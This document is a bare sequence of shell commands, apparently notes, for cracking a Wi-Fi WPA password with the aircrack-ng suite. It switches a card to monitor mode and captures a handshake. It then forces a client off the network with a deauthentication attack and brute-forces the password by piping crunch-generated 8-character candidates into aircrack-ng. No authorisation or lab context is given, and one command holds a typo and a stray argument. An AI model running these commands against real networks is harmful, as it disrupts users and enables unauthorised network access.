airmon-ng start wlan0

airodump-ng wlan0mon

airodump-ng -c 11 --bssid  "bssid" 6 -w outpout wlan0mon

aireplay-ng -0 1 -a "bssid" -c "station" wlan0mon

crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789  | aircrack-ng -w - -b "bssid" *.cap

